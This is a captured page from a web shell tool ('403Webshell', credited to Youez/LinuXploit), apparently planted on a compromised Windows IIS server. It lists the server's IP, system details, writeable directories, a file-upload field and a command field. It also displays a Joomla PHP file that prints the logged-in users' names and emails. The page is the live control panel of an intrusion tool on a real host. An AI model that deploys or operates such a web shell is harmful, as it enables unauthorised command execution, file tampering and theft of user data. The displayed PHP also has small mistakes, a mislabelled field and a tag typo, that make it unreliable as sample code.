403Webshell
Server IP : 195.130.67.5  /  Your IP : 216.73.217.154
Web Server : Microsoft-IIS/10.0
System : Windows NT WEBSERVER1 10.0 build 17763 (Windows Server 2016) i586
User : IUSR ( 0)
PHP Version : 7.4.19
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Old Sites/ees_request/externalpages/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/Old Sites/ees_request/externalpages/example.php
<?php
    
    define( '_JEXEC', 1 );
    define('JPATH_BASE', dirname(__FILE__) );
    define( 'DS', DIRECTORY_SEPARATOR );

    require_once ( JPATH_BASE .DS.'includes'.DS.'defines.php' );
    require_once ( JPATH_BASE .DS.'includes'.DS.'framework.php' );

    require_once ( JPATH_BASE .DS.'libraries'.DS.'joomla'.DS.'factory.php' );

    $mainframe =& JFactory::getApplication('site');


    $user =& JFactory::getUser();    
    
    if (!$user->guest) {
 
     echo "<br><b>Όνομα:</b> ".$user->name;
     echo "<br><b>Όνομα Χρήστη: </b>".$user->username;
     echo "<br><b>Email: </b>".$user->email;
     echo "<br><b>Email: </b>".$user->surname;
 ?>
    <table>
        <tr>
            <td>Όνομα:</td><td><?php echo $user->name;  ?></td>
        </tr>
    </table>
 
 <?php
     
    }
    else {
        echo "<br><font color='red'>Απογορεύεται η πρόσβαση. Δεν είστε συνδεδεμένοι!</fpnt>";
    }


?>

Youez - 2016 - github.com/yon3zu
LinuXploit